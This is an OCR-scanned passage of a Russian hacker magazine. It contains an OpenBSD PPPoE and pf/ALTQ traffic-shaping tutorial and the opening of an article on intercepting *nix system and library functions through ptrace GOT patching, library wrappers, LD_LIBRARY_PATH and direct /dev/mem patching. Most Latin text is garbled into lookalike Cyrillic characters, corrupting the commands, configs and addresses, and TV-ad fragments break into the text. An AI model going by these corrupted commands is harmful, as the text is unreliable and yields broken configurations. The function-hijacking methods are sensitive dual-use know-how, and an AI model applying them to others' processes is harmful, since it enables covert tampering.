фик-шейпинг 

УТОЧНЯЕМ ДИСПОЗИЦИЮ 

Рассмотрим вариант с АОЗБ-соединени- 
ем. Предполагается, что к данному моменту 
ЕЙіегпеІ-порт АОЗБ-модема с помощью крос- 
соверного кабеля уже подключен к сетевой 
карте (ѴІА ѴТ6103, интерфейс ѵгО). Будем счи- 
тать, что на компьютере, выполняющем функ- 



ции шлюза, установлена карточка беспровод- 
ного доступа (ѲідаЬуІе (ЗЫ-ѴѴРКѲ, интерфейс 
гаЮ). Для наглядности сценарий можно пред- 
ставить следующим образом: 

[ АОЗБ Мобет ] — (ѵгО) 

\ 

[ ОАТЕѴѴАУ КррроеО) [ ІЗР ]- 

/ 

[ БАРТОР ] (гаЮ) 

Весь изложенный материал можно приме- 
нять не только для АОЗБ-соединений, сов- 
сем необязательно держать для таких задач 
выделенный сервер, и в качестве используе- 
мой операционной системы может выступать 
любая из *ВЗО. 

БЕСКОМПРОМИССНАЯ ДУЭЛЬ: Ш- 
КЕПЫЕІ. Ѵ8 Ц8ЕШ.АН0 

В ОрепВЗО (как, впрочем, и в ЫеІВЗО) при- 
сутствуют сразу две реализации РРРоЕ. 
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список доступных сетевых 
интерфейсов 

Первая представляет собой утилиту рррое(8) 
из пространства пользователя, которая, 
помимо всего прочего, способна детально 
журналировать события и производить тон- 
кое конфигурирование соединений. 

Вторая реализация — рррое(4) — появилась 
относительно недавно (в версии 3.7), выпол- 
нена в виде драйвера и работает на уровне 
ядра. К ее преимуществам стоит отнести: 
скорость работы, существенно меньшую 
нагрузку на процессор, простоту настройки 
и автоматическое создание соединений при 
загрузке системы. Так что отличия в исполь- 
зовании довольно существенные. Взвесив 
все за и против, резонно будет остановить 
свой выбор на іп-кегпеі рррое. 

Первым делом нужно убедиться, что псевдо- 
устройство рррое находится в боевой готов- 
ности: 

% іісопіід -С 

рррое ігипк ѵіап іип 8І ррр Іо дге діТ сагр Ьгісіде 

В случае отрицательного ответа необходимо 
перекомпилировать ядро с включенной опци- 
ей: 

рзеиЬо-Ьеѵісе рррое 1 

Для настройки подключения к АОЗЬпро- 
вайдеру достаточно указать внешний сете- 
вой интерфейс (ѵгО, файл /еіс/іювіпате .ѵгО 
можно даже не создавать), протокол опозна- 
вания (возможные варианты: рар, сііар, попе), 
имя пользователя (ивег) и пароль (раззѵгогсі). 
Все! Разборки с динамически получаемыми 
ІР-адресами и внесение необходимых запи- 
сей в таблицу маршрутизации операционная 
система в ходе установки РРР-сессии берет 
на себя: 

# ѵі /еіс/ііозіпате. ррроеО 
ррроесіѳѵ ѵгО 
!/зЬіп/і(сопіід ѵгО ир 

І/изг/зЬіп/зрррсопігоІ \$іі туаиіЬргоіо=сЬар \ 
туаиіЬпате=изег туаиІІікеу=раззѵѵогсІ 
І/зЬіп/іісопіід \$і( іпеі 0.0. 0.0 0.0. 0.1 пеітазк ОхШШІ 
І/зЬіп/гоиІе аЬЬ гіеіаиіі 0.0. 0.1 
ир 

После перезагрузки (зЬиМоѵт -г по») на 
экране и в /ѵаг/Іод/теввадев можно увидеть 
сообщения ядра, извещающие об успешной 
настройке РРРоЕ-соединения: 

ррроеО: рЬазе езіаЫізЬ 
ррроеО: рЬазе аиіііепіісаіе 
ррроеО: рЬазе пеімюгк 

Проверить состояние псевдоинтерфейса 
можно с помощью следующей команды: 

% іісопіід ррроеО 

ррроеО: (1адз=8851<иР,Р0ШТ0Р011\1Т,В1Ш11\18,51МР 




ІЕХ,МиіТІСА5Т> тіи 1492 
сіеѵ: ѵгО зіаіе: зеззіоп 

ЗІЬ: 0х6а5 РАРІ геігіез: 2 РАбВ геігіез: 0 Ііте: 01 :30:59 
дгоирз: рррое едгезз 

іпеі 85.140.23.73 ~> 0.0.0.1 пеітазк ОхШШ 
іпеіб 1е80::240:63Н:(еРс:176с%рррое0 -> ргеііхіеп 64 
зсореШ 0x7 

ВСЯ ПРАВДА О ТСР-СОЕД МНЕНИЯХ 

Чтобы понять, как грамотно, без снижения 
надежности и безопасности хоста в целом, 
выжать максимум из доступного интернет- 
канала, необходимо обратить пристальное 
внимание на процедуру установки ТСР- 
соединения. Мы примем такие соединения за 
основной трафик, так как подавляющее боль- 
шинство сетевых служб при работе использу- 
ет именно ТСР. 

За счет системных вызовов — зоскеі(2), 
Ьіпб(2) и Ііз(еп(2) — сервер ожидает обраще- 
ния на выделенном порту. Клиент отправляет 
пакет с установленным флагом ЗУЫ и сооб- 
щает серверу начальный порядковый номер 
данных, используемый для синхронизации. 
Сервер подтверждает получение клиентско- 
го сегмента (АСК) и отправляет в ответ свой 
собственный $ѴІ\І, при этом увеличивая зна- 
чение поля Аскпоѵѵіесідтепі ЫитЬег в ТСР- 
заголовке на единицу. Клиент, получив сег- 
мент $ѴІ\І от сервера, отправляет ему АСК, 
чтобы завершить трехэтапное рукопожатие. 
С этого момента ТСР-соединение считается 
успешно настроенным, в передаваемых паке- 
тах используется только АСК, а ЗѴЫ-флаги 
больше не устанавливаются. 

При создании набора правил фильтрации для 
протокола ТСР хорошей практикой является 
контроль за прохождением пакетов с ЗУІ4 
и АСК в случае, когда флаг ЗУІЧ уже «взве- 
ден»: 



зсгиЬ оп $ехі_іі аІІ 

разз іп Іод(аІІ) оп $ех(_і1 іпеі ргоіо іср ігот апу \ 
(о апу рогі ззіі (Іадз 3/5А кеер зіаіе 
разз оиі оп $ех(_і( іпеі ргоіо іср ігот апу іо апу \ 

(Іадз 5/5А кеер зіаіе 

Особую роль здесь играет ключевое слово 
кеер зіаіе, с помощью которого сохраняется 
вся информация о пакетах, соответствующих 
данному правилу. Использование кеер зіаіе 
упрощает написание правил файрвола, повы- 
шает производительность фильтра пакетов, 
а также препятствует проведению некоторых 
сетевых атак, например ІР-спуфинга, когда 
атакующий отправляет пакеты с подделан- 
ными адресом и портом источника. Указав 
в правиле тосіиіаіе зіаіе вместо кеер зіаіе, 
мы включим модуляцию для исходящих ТСР- 
соединений и получим качественно сгенери- 
рованные ІЗІМ-числа. Так мы станем менее 
уязвимыми для атак типа ТСР Нуаскіпд. 

При работе зсгиЬ необходимость в постоян- 
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ном слежении за РИМ и РЗТ отпадает, так как 
зсгиЬ позволяет не только производить нор- 
мализацию пакетов и пересобирать фрагмен- 
тированные ІРѵ4-дейтаграммы, но и отбрасы- 
вать пакеты с недопустимыми комбинациями 
флагов. Кроме того, с помощью этой дирек- 
тивы можно установить максимальное коли- 
чество данных, которое узел, отправляющий 
ЗУІЧ, будет принимать в каждом ТСР-сегменте 
по данному соединению. Зачем? Чтобы попы- 
таться предотвратить фрагментацию пакетов. 
Формула вычисления значения параметра 
МЗЗ (ІѴІахітит Зедтепі Зіде) такова: макси- 
мальный размер ЕіЬегпеі-кадра (1500) - заго- 
ловок РРРоЕч-РРР (8) - заголовок ІР (20) - заго- 
ловокТСР (20) = 1452. Примечание: заголовок 
ІРѵ4 имеет длину 20 байт, а заголовок ІРѵб — 
40 байт. Будь осторожен, неверные значения 
МЗЗ и МТІІ (максимальная единица переда- 
чи, которая определяется характеристиками 
аппаратных средств и требованиями прото- 
колов) могут привести к потере в скорости и 
недоступности некоторых сайтов. 

зсгиЬ іп оп $ехі_і( аІІ 

зсгиЬ оиі оп $ехі_і( аІІ гапсІот-ІЬ тах-тзз 1452 

В данном примере опция гапсіот-ісі позволяет 
генерировать случайные идентификаторы в 
заголовках исходящих ІР-пакетов. 

При работе по протоколу ТСР мы получаем 
надежные двунаправленные соединения (дан- 
ные отправляются и принимаются в обоих 
направлениях в любой момент времени). Даже 
при скачивании файла клиенту приходится 
отправлять серверу АСК'и, чтобы избежать 
увеличения времени ожидания и потери/дуб- 
лирования пакетов. 

А что произойдет, если одновременно мы 
начнем закачивать что-либо на удаленный 
сервер? К примеру, заливать сайт на хостинг 
или отправлять письма о вложениями. Вне 
зависимости от используемой операционной 
системы результат окажется неутешительным 
— появится задержка всех исходящих паке- 
тов с установленными АСК-флагами, и ско- 
рость скачивания заметно упадет. 

Так что решение задачи напрашивается само 
собой: нужно дать указание файрволу обра- 
батывать сегменты АСК в первую очередь. К 
слову, по объему такие пакеты довольно малы 
и не несут никакой полезной нагрузки. 

ОГНЕННАЯ ДУГА 

В ОрепВЗО для ограничения пропускной 
способности используется АБТО (АІіегпаіе 
Оиеиеіпд, Альтернативная Организация 
Очередей). Как следует из названия, с ее 
помощью можно привязывать пакеты к задан- 
ным очередям. В реализации АНО важную 
роль играет планировщик, который предпи- 
сывает алгоритм, используемый для выбора 
действия над пакетами (задержать/отбро- 
сить/отправить немедленно). В настоящее 
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время существует три вида планировщиков 
очередей: СЕЮ (СІазз ВазесІ Оиеиеіпд), РВЮ 
(Ргіогііу Оиеиеіпд — наш случай) и НРЗС 
(Ніегагсііісаі Раіг Зегѵісе Сигѵе). Различные 
планировщики можно запускать на разных 
сетевых интерфейсах, к примеру, СВО — на 
внутреннем, а РВЮ — на внешнем. Это дает 
поистине уникальные возможности для раз- 
граничения трафика. 

Особого внимания заслуживает определе- 
ние полосы пропускания исходящего тра- 
фика. Данное значение следует выставлять 
очень аккуратно, так как если его завысить, 
то приоритезация будет неэффективна, а 
если занизить, то доступная ширина будет 
использована не полностью. В моем слу- 
чае эта цифра весьма скромна — 100 кЬрз 
(провайдер выделяет скорость к абоненту/ 
от абонента, которая равна 256/128 кЬрз, 
минус затраты, связанные с инкапсуляцией 
РРРоЕ): 

аііц оп ррроеО ргіц ЬапсІѵѵісШі ІООКЬ циеие ( список 
очередей ! 

Все точки над «і» расставлены. В правилах 
файрвола остается выделить входящие и 
исходящие подключения, классифицировать 
очереди и произвести фильтрацию пакетов. 
Приступим. 

# ѵі /еіс/рі.сопі 

/* Для экономии динамически выделяемой памяти 
уменьшаем значения таймаутов в таблице состояния 
соединений */ 
зеі оріігтшаііоп аддгеззіѵе 



/* Нам нет дела до входящих ІСМР-запросов, выстав- 
ляем самый низкий приоритет */ 
разз іп оп ррроеО іпеі ргоіо істр Ігот апу \ 

Іо (ррроеО) істр-іуре 8 собе 0 \ 
кеер зіаіе (тах 32) диеие (д_Іо«) 



Далее утилитой сгопІаЬ вызываем текстовый 
редактор (тот, что определен в переменной 
окружения $ЕЭ1ТОЕ1) для постановки різіаі 
на исполнение и ротации логов в заданное 
время: 



/* Все ІСМР- и ІЮР-соединения (кроме 53/ибр, см. 
правило ниже) отнесем к дефолтной очереди 7 
разз оиі оп ррроеО іпеі ргоіо ( ибр, істр I ігот (ррроеО) \ 
іо апу кеер зіаіе циеие (ц_беі) 

/* Определение соответствия между именами хостов 
и их ІР-адресами доверим очереди с приоритетом 
Ч_Ьід */ 

разз оиі оп ррроеО іпеі ргоіо ибр ігот (ррроеО) \ 
іо апу рогі ботаіп кеер зіаіе циеие (ц_Ыд) 

/* Если в поле заголовка ІР-пакета установлен ТСР 
АСК или ТОЗ ЦМОЕЬАУ (к примеру, это могут быть 
интерактивные ззіі-сессии), используем очередь 
тах, иначе ц_бе( У 

разз оиі оп ррроеО іпеі ргоіо (ср (гот (ррроеО) іо апу \ 
ііадз 5/5А кеер зіаіе циеие (ц_бе(, ц_тах) 

/* Обращения к удаленным ѴѴеЬ-сайтам имеют 
наивысший приоритет */ 
разз оиі оп ррроеО іпеі ргоіо (ср (гот (ррроеО) \ 
іо апу рогі жиж ііадз 5/5А кеер зіаіе \ 
циеие (цфід, д_тах) 

Активируем правила: 

# рісіі -е -і /еіс/рі.сопі 

Проверяем, вступили ли в силу новые изме- 
нения: 



# сгопіаЬ -е 

***** /изг/ІосаІ/Ьіп/різіаі -д »/ѵаг/Іод/р(з(аі 
11**1 іаіі -п 50000 /ѵаг/Іод/різіаі >/ітр/різ(а( \ 

&& тѵ /ітр/різіаі /ѵаг/Іод/різіаі 
*/1 * * * * /изг/ІосаІ/Ьіп/різіаі -с /еіс/різіаі.сопі \ 
-б /ѵаг/Іод/різіаі >/беѵ/пиІІ 

Р8. Статья не претендует на роль полноцен- 
ного руководства или панацеи на все случаи 
жизни. Для каких-то типов соединений выиг- 
рыш будет больше, для каких-то — меньше. 
Истинный результат может показать только 
эксперимент. 

ВІНДПѴ ѴОІЛГ5 ни 



„и&« ОЕ(8) 

Редактируем ррр.сопР: 

# ѵі /етс/ррр/ррр.сопб 

сіеіаиіі: 

5еі Іод Рііазе Сііаі ЮР ІРСР ССР 
іип соттапсі 
ОізаЫе ірѵбср 



/* Включаем нормализацию и дефрагментацию 
ІРѵ4-пакетов на РРРоЕ-интерфейсе */ 
зсгиЬ іп оп ррроеО аІІ 

зсгиЬ оиі оп ррроеО аІІ гапбот-іб тах-тзз 1452 

/* Прохождение ІРѵ4-пакетов на интерфейсе обрат- 
ной петли и на внутренних сетевых интерфейсах 
разрешаем без ограничений */ 
разз циіск оп ( Іо0, ѵгО, гаІО ) іпеі аІІ 

/* Включаем А1_ТС1, в качестве планировщика выби- 
раем РВЮ, назначаем 4 очереди с разными приори- 
тетами */ 

аііц оп ррроеО ргщ ЬапбиібіЬ ІООКЬ диене { ц_тах, 

д_Ыд, ц_беі, цДож ) 

циеие ц_тах ргіогііу 7 

циеие ц_Ыд ргіогііу 5 

циеие ц_бе( ргіогііу 3 

диеие д_1ож ргіогііу 1 ргід(беіаиіі) 



# рісіі -зя 

циеие ц_тах ргіогііу 7 
циеие ц_Ыд ргіогііу 5 
циеие ц_беі ргіогііу 3 
циеие цДож ргід( беіаиіі ) 

ВИЗУАЛИЗАЦИЯ ТРАФИКА 

На этом обе части настройки закончены. 
Теперь, чтобы оценить выигрыш от исполь- 
зования АНѲ/РВЮ, можно воспользоваться 
різіаі. Эта программа из дерева портов пре- 
красно справляется с задачей обработки ста- 
тистики рі и построения наглядных графиков. 

# ссі /изг/рогіз/пеі/різіаі 

# таке іпзіаіі сіеап С1ЕАЫОЕРЕМОЗ=Уез 

Приведу пример конфигурационного файла 
різіаі.сопі: 



рррое: 

зеі сіеѵісе "І/изг/зЬіп/рррое -і ѵгО“ 

зеі тіи тах 1492 

зеі тги тах 1492 

зеі зреесі зупс 

сІізаЫе асісотр ргоіосотр 

сіепу асісотр 

зеі аиіііпате изег 

зеі аиіРкеу раззѵѵогсі 

асісі! сіеіаиіі НІ5А00Я 

Так как конфиг содержит 
имя пользователя и пароль, 
выставляем корректные права 
доступа: 

# сЬтосі 600 /етс/ррр/ррр. 
сопС 



/* Производим трансляцию сетевых адресов */ 
паі оп ррроеО іпеі ігот 1 92.1 68.1 .0/24 \ 
іо апу -> (ррроеО) 

/* Регистрируем заблокированные попытки соедине- 
ния */ 

Ыоск геіигп Іод(аІІ) 



# ѵі /еіс/різіаі.сопі 

ітаде "/ѵаг/ѵѵиѵѵ/Ыбосз/рІзіаі/рІзіаі.Ірд" { 

(гот 10 тіпиіез (о поѵѵ 
иібіЬ 960 ЬеідИ 300 
Іеіі 

дгарЬ Ьу(ез_ѵ4_іп ІаЬеІ "іпсотіпд" соіог 0 192 0 (ІІІеб, 
дгарЬ Ьуіе$_ѵ4_оиі ІаЬеІ "оиідоіпд" соіог 0 0 255 ! 



Устанавливаем РРРоЕ-соеди- 
нение: 

# ррр -сісііаі рррое 
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СЕГОДНЯ 20:00 




ТЕЛЕКАНАЛ 




ѵѵѵт . о Р Н с Е-ТІЧТ. РШ 
ѴѴАР.ОРРІСЕ-ТідТ.Пи 



Зіа -Алком ГН- 4 ОСтидеДОле 



С*»- тн ІѴЙКЖ* 



И- ХО-+ *™ I' •»!?(*■ 





ІІІЧІХОЮ 




ЕХТ КРИС КАСПЕРСКИ АКА МЫЩЪХ 



СИСТЕМНЫЙ 

ШПИОНАЖ 

В *ЫІХ 
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КАК УЗНАТЬ, КАКИЕ 
ФУНКЦИИ ВЫЗЫВАЕТ 
ПОДОПЫТНАЯ ПРОГРАМ- 
МА? НАПРИМЕР, 

В ѴѴІМООѴѴЗ СУЩЕСТВУЕТ 
ЦЕЛЫЙ АРСЕНАЛ ШПИОН- 
СКИХ СРЕДСТВ, НО *МХ- 
ХАКЕРАМ ВЕСЬ ИНСТРУ- 
МЕНТАРИЙ ПРИХОДИТСЯ 
РАЗРАБАТЫВАТЬ САМО- 
СТОЯТЕЛЬНО. СЕЙЧАС 
МЫЩЪХ ПОКАЖЕТ, КАК 
ОСУЩЕСТВЛЯЕТСЯ ПЕРЕ- 
ХВАТ И ПОДМЕНА СИСТЕМ- 
НЫХ И БИБЛИОТЕЧНЫХ 

функций в ишх и *взо. 



ХАКЕР 03 /87/ 06 





ВВЕДЕНИЕ 



При всей непохожести ѴѴІпсІоѵѵз и І_іпих между ними можно выделить общие черты. Обе системы образуют «слоеный пирог» 
из библиотек различных уровней иерархий. Ядерные функции ѴѴІпсІоѵѵз N1 сосредоточены в файле піозкгпі.ехѳ, доступ к 
которым осуществляется через прерывание ІЫТ 2Е6 (ІМТ 3.5х, ІМТ4.Х, ѴѴ2К) или через ІІЧТ 2Е6/зузепІег (ХР, Болдбот). В І_іпих 
для той же цели используется ІІМТ 806 (х86 ВЗЭ использует гибридный механизм, одновременно поддерживая как ІІМТ 806, 
так и саІІ Іаг 00076:000000006). 

Ядро реализует базовые функции ввода/вывода, распределения памяти, создания/завершения процессов и т.д., причем, 
если ІМТ предоставляет низкоуровневые полуфабрикаты, над которыми еще предстоит поработать, ядерные функции 
1_іпих (они же «системные вызовы», а по-английски зуз-саііз) вполне юзабельны. Тем не менее, прямые обращения к ядру 
с прикладного уровня встречаются редко. Вместо этого приложения предпочитают использовать системно-независимую 
библиотеку ІІЬс.зо.х — отдаленный аналог кегпеІ32.сІІІ из ѴѴІпсІоѵѵз. Эта библиотека загружается в физическую память всего 
один раз, а затем проецируется на адресное пространство всех используемых ее процессов («зо» расшифровывается как 
збагеб оЬіесІ [Тііе], ах — номер версии, например ІІЬс.зо.6). 

Помимо ІІЬс, существуют и другие библиотеки, например ІІЬпсигзез.зо.х, отвечающая за управление курсором и отрисовку 
псевдографики в текстовом режиме («аналог» изег32.бІІ). Библиотеки могут подключаться как на стадии загрузки еІБфайла 
через таблицу символов (аналог таблицы импорта), так и динамически по ходу выполнения программы посредством вызова 
функций біореп/бізут (аналог БоабБІЬгагу/ѲеІРгосАсІсІгезз). Наконец, всякая программа содержит большое количество 
непубличных и неэкспортируемых функций, которые также требуется перехватывать. 



ОБЗОР ВОЗМОЖНЫХ МЕТОДОВ 



Условимся рассматривать универсальные методики 
перехвата, не требующие модификации ни подопыт- 
ного файла, ни ядра и работающие под любой *піх- 
подобной системой (возможно, с небольшими пере- 
делками). Начнем с классики, то есть издалека. Один 
из самых популярных методов перехвата, активно 
используемый под ѴѴІпсІоѵѵз и называемый «методом 
модификации [таблицы] импорта», выглядит так: 

создаем отладочный процесс вызовом !огк()/ехес()/ 
рІгасе(РТНАСЕ_ТВАСЕМЕ [в В$Э — РТ_ТРАСЕ_МЕ, 
(в дальнейшем ВЗЭ-объявление будет приводиться 
через слэш]) или подключаемся к уже запущенному 
процессу через р1гасе(РТВАСЕ_АТТАСН/РТ_АТТАСН, 
ріф 0, 0); 

через функцию р1гасе(РТРАСЕ_РЕЕКТЕХТ/РТ_ 
ВЕАЭ_І, ріф аббг, 0) читаем глобальную таблицу сме- 
щений (ОІоЬаІ ОІІзеІ ТаЫе, СОТ) — аналог таблицы 
импорта; 

посредством функции р1гасе(РТВАСЕ_РОКЕТЕХТ/ 
РТ_ѴѴВІТЕ_І, ріф аббг, сіаіа) модифицируем указатели 
на нужные нам функции, заменяя их на ойзеі Ібипк, 
где Ібипк — наш обработчик, внедренный в адрес- 
ное пространство процесса тем или иным путем 
(например, при помощи той же РТВАСЕ_РОКЕТЕХТ/ 
РТ_ѴѴВІТЕ_І); 

контроль за динамически загружаемыми биб- 
лиотеками осуществляется путем перехвата функций 
сПореп/Фзут, экспортируемыми ІІЬбІ.зо.х, но факти- 
чески реализованных в ІІЬс.зо.х (там они называются 
_Ы_ореп/_Ы_зут); 

— непубличные функции самой программы и ста- 
тические библиотеки перехватываются путем внед- 
рения команды іитр Ібипк в их начало (естественно, 
оригинальное содержимое нужно где-то предвари- 
тельно сохранить) с поиском по сигнатурам или с 
привязкой к фиксированным адресам; 

отсоединяемся от процесса через рігасе (РТВАСЕ_ 
ОЕТАСН/РТ_ЭЕАТАСН, ріф 0, 0), позволяя ему про- 
должить нормальное выполнение, но теперь уже с 
модифицированной СОТ, вызывающей функции 
через наш хакерский Ібипк, который может прото- 
колировать вызовы, «мухлевать» с аргументами или 



даже передавать управление подложным функциям; 
Метод «модификации импорта» легко реализуется, 
надежен, но не освобожден от недостатков. В ѴѴІпсІоѵѵз 
функции НеасІРгосеззМетогу/ѴѴгіІеРгосеззМетогу не 
требуют от процесса, чтобы он находился под отлад- 
кой, и подопытному приложению очень трудно им про- 
тивостоять. Их Біпих-аналоги являются частью библи- 
отеки рігасе, обломать которую очень легко (см. мою 
статью «Методология защиты в мире ІЛМІХ», опубли- 
кованную в Хакере год назад). К тому же подопытный 
процесс может вырваться из лап шпиона. Для этого 
ему достаточно породить дочерний процесс или сде- 
лать себе ехес(), чтобы перезапуститься. В этом слу- 
чае системный загрузчик перечитает исходный образ 
ЕБЕ-файла с диска, и все изменения в (ЗОТ'е будут 
потеряны. Чтобы этого не произошло, наш шпион 
должен следить за всеми потенциально опасными 
функциями, пускай и ценой усложнения реализации. 
И последнее (но самое главное) ограничение — шпи- 
онаж носит сугубо локальный характер и может кон- 
тролировать только дочерние процессы или процес- 
сы, явно переданные ему «на съедение». 

А вот другой популярный прием, называемый методом 
«подмены библиотеки», также позаимствованный из 
мира ѴѴІпсІоѵѵз: 

*создаем «обертку» (ѵѵгаррег) вокруг библиотеки, 
экспортирующей те же самые функции, что и она; 

оригинальную библиотеку переименовываем 
или размещаем в другом месте; 

функции-обертки определяют идентификатор 
вызывающего их процесса, и, если это действительно 
«их» процесс, совершают заранее запланированные 
действия (пишут вызов в Іод, подменяют аргументы 
или код возврата и т.д). Как определить ісі процесса? 
Это легко, ведь функции-обертки вызываются из кон- 
текста процесса, который их использует, и решение 
задачи сводится к выяснению идентификатора теку- 
щего процесса, возвращаемого функцией де!рісІ(); 

функция-обертка передает управление ориги- 
нальной функции основной библиотеки или своей 
собственной подложной функции; 
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За внешней простотой реализации такого подхода кроется целый ворох проблем. Создать обертки вокруг всех «систем- 
ных» библиотек вручную практически нереально, и эту работу необходимо автоматизировать, написав несложный парсер 
зо-файлов и кодогенератор. Необязательно генерировать готовый ЕІ_Р-файл, проще создать Си-программу и откомпили- 
ровать ее с помощью дсс. 

«Глобальность» перехвата воздействует на все процессы, и кривая «обертка» рушит ось так, что только дампы летят. 
Давай не будем трогать системные библиотеки, а вместо этого изменим переменную Ш_І_ІВРАРѴ_РАТН в окружении 
«подопытного» процесса. Она специально предусмотрена на тот случай, если отдельно взятому приложению требуется 
предоставить свой набор библиотек (статический и динамический загрузчики сначала ищут библиотеку в путях, ука- 
занных иэ_І_ІВРАРѴ_РАТН, и только если там ее не оказывается, переходят к файлу /еГс/И.зо.солГ, а затем к путям /ІІЬ и 
/ивг/ІІЬ), но, если «подопытный» процесс попытается загрузить библиотеку по абсолютному пути, он сможет вырваться 
из-под нашего контроля! 

Перспективнее всего осуществлять перехват путем прямой модификации памяти подопытного без обращения к рігасе. 
Как это можно сделать? Первым в голову приходит файл /ргос/<рісІ>/тет, однако в большинстве систем он недоступен 
даже гооі'у, и приходится спускаться на уровень ядра, что сильно напрягает. Хакерские источники упоминают о двух 
других интересных файлах: /сіеѵ/тет (образ физической памяти компьютера до трансляции виртуальных адресов) и /йен/ 
ктет (образ виртуальной памяти ядра). Файл /сіеѵ/ктѳт с прикладного уровня обычно недоступен, и никаких библиотек 
прикладного уровня здесь нет, поэтому нам он совершенно неинтересен, а вот /сіеѵ/тет мы рассмотрим поподробнее. 







Чтение документации («тап тет») показывает, что 
файл /сіеѵ/тет имеется практически на всех *піх- 
подобных системах, а если его вдруг нет, то он может 
быть создан в любой момент следующими командами: 

# гпкпоб -т 660 /сіеѵ/тет с 1 1 

# сИоѵѵп гообктет /сіеѵ/тет 

Здесь 660 — права доступа, /сіеѵ/тет — имя файла 
(любое, например /Ьоте/крпс/пегиті), «с» — тип уст- 
ройства (символьное устройство), «1 1» — устройство 
(физическая память). Файл /сіеѵ/тет свободно досту- 
пен с прикладного уровня, но только для гооі, что не 
есть хорошо. 

Структура файла предельно проста — линейные сме- 
щения соответствуют физическим адресам. Допустим, 
нам известно, что на РРРРГгРРРОИ во всех ВІОЗ'ах хра- 
нится команда перехода на загрузочный код, а за ним, 
как правило, лежит дата создания прошивки . Переводим 
«сладкую парочку» — сегментюмещение — в линейный 
вид (Ііпеаг == зед*10Гі + оОзеІ), получаем РРРРОИ. Это и 
будет смещение в файле. 

Основной камень преткновения в том, что *піх исполь- 



зует оперативную память как кэш, и поэтому одни и 
те же физические страницы в различное время могут 
соответствовать различным виртуальным адресам. 
Но это не проблема. Можно найти каталог страниц и 
выполнить трансляцию вручную. Указатель на текущий 
каталог хранится в регистре СРЗ, попытка доступа к 
которому с прикладного уровня возбуждает исключе- 
ние, но поскольку каталог имеет довольно характерную 
структуру, описанную в документации на процессор, 
его легко найти простым сканированием физической 
памяти. 

Часть виртуальных страниц, принадлежащих процес- 
су, может быть выгружена на диск, и тогда в файле 
/сіеѵ/тет ее не окажется. При хроническом недо- 
статке оперативной памяти значительный процент 
адресного пространства процесса попадает на диск, 
и хотя совместно используемые библиотеки вытес- 
няются в последнюю очередь, они все-таки вытес- 
няются (особенно редко используемые функции). 
Это значит, что прежде чем ковыряться в /сіеѵ/тет, 
необходимо загрузить соответствующую функцию в 
память. А как это сделать? Например, просто ее вызы- 
вать. Вызов функции не гарантирует загрузки всех 







принадлежащих ей страниц, но нам этого и не надо! Достаточно воткнуть в начало функции щтр на свой ІЬипк, чтобы 
загрузилась первая страница. 

Для нейтрализации побочных эффектов функцию обычно вызывают с инвалидными аргументами, чтобы она завершилась 
без выполнения, однако это — грязный трюк, на который ведутся далеко не все функции. В частности, де!з() упорно ожида- 
ет ввода с клавиатуры, даже если в качестве указателя ей передать нуль. Если память, принадлежащая функции, доступна 
на чтение (а в ипцх/ВЗР она доступна), то нам достаточно прочитать несколько байт от начала функции — это гаранти- 
рованно загрузит принадлежащую ей страницу в физическую память. Собственно говоря, для поиска перехватываемой 
функции в /беѵ/тет нам все равно потребуется ее сигнатура, так что без чтения здесь не обойтись. 

Весь вопрос в том, как определить адрес функции? Существует, как минимум, два пути: получить указатель средствами 
языка Си или вызвать бізут. В обоих случаях результаты будут различны, что и подтверждает программа деІ_асІсІг.с, опре- 
деляющая адрес функции деіз (исходный код приложен на диске). 

Компилируем (дсс де(_асІсІг.с -о де(_асІсІг -161) и запускаем полученный файл на выполнение (ключ '-ІбГ подключает библио- 
теку 61, экспортирующую функции сНореп и сіізут). На мыщъхином компьютере результат выглядит так: 



результат 


х = деІ5:08048364(і 


работы 


08048364 ІгРР 25 А8 98 04 08 68 08 00 


программы 


00 00 Е9 60 РР РР РР 


деІ_асІсІг 


базе ІІЬс.зо.6:4001 79Е8І1 

4001 79Е8И:00 СО 02 40 Э8 79 01 40 30 




В5 15 40 6С 66 01 40 




дІ5ут(,"де1з"):4008СЕ601і 
4008СЕ60И:55 89 Е5 57 56 53 83 ЕС 2С 




8В 75 08 Е8 АС 46 ЕВ 



Указатель на функцию деіз, судя по адресу (080483641т), 
смотрит на секцию .ріі, то есть находится во «владени- 
ях» текущего процесса. Первые байты функции равны 
РЕИ 25Н А81т 98Н 04И 08Н, что соответствует команде 
ЛѴІР [080498А8И]. Выходит, это еще не сама функция, 
а только переходник к ней! Адрес 080498А8И хранится 
в двойном слове, лежащем в СОТ. Модификация РІЛѴ 
СОТ обеспечивает перехват функции лишь в пределах 
текущего процесса, что, с одной стороны, очень даже 
хорошо, но с другой — очень плохо. 

Базовый адрес библиотеки — ІІЬс (400179Е8Ь) — 
лежит в непосредственной близости от истинного 
адреса функции деіз (4009СЕ60Н), возвращаемый 
бізугп. В глаза сразу же бросается классический 
пролог — 55И/89ІТ Е5Ь (РІІЗН ЕВР/МОѴ ЕВР.ЕЗР), 



который мы и будем патчить для перехвата, но спер- 
ва разберемся, как работать с /деѵ/тет. 

/деѵ/тет — это необычный файл. Если в МібпідЫ 
Соглтапбег подвести к нему курсор и нажать <ЕЗ> — 
ничего не выйдет! Некоторые источники утверждают, 
что функция 1ореп() не способна открыть /беѵ/тет, и 
нужно использовать низкоуровневые функции операци- 
онной системы, например ореп/геаб/ѵѵгііе. Мыщъх про- 
верил: в Кпорріх и ЕгееВЗО функции (ореп/ігеасІАгшіІе 
работают нормально, но, возможно, на других системах 
они ведут себя не так, поэтому все сделаем согласно 
общим рекомендациям. 

Маленький нюанс: под ЕгееВЗО 4.5 (более свежие вер- 
сии не проверял) геаб() всегда возвращает позитивный 
результат, даже если /беѵ/тет уже «кончился», поэ- 
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тому закладываться на возвращаемое значение этой 
функции нельзя. 

А давай проведем небольшой эксперимент! Возьмем 
какую-нибудь редко используемую библиотечную фун- 
кцию, например де1з(), и пропатчим ее по полной про- 
грамме, внедрив в начало байт СЗб, соответствующий 
машинной инструкции НЕТИ, а потом вызовем ее и пос- 
мотрим, получилось у нас или нет. 

Запускаем ЮА РРЮ, загружаем ІІЬс.зо.6, переходим к 
функции деіз (<СігІ-Ѳ>, «деіз», <ЕІ\ІТЕВ>) и смотрим, 
какие байты расположены в начале функции (чтобы 
ЮА РРЮ отображала машинный код рядом с инструк- 
циями, необходимо в меню Орііопв выбрать пункт «Тех! 
гергезепіаііоп» и в попе «ІМитЬег оі орсобе Ьуіез» пос- 
тавить «7»), Если нет ЮА РРЮ, то содержимое функ- 
ции можно определить с помощью нашей программы 
деІ_аббг.с. На мыщъхином компьютере первые 1 0Н байт 
